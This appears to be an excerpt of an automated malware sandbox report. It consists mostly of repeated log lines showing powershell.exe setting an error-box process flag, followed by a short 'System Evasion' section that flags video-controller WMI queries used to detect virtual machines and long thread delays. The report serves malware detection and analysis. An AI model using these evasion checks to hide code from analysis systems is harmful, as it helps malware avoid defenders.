Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4538Jump to behavior
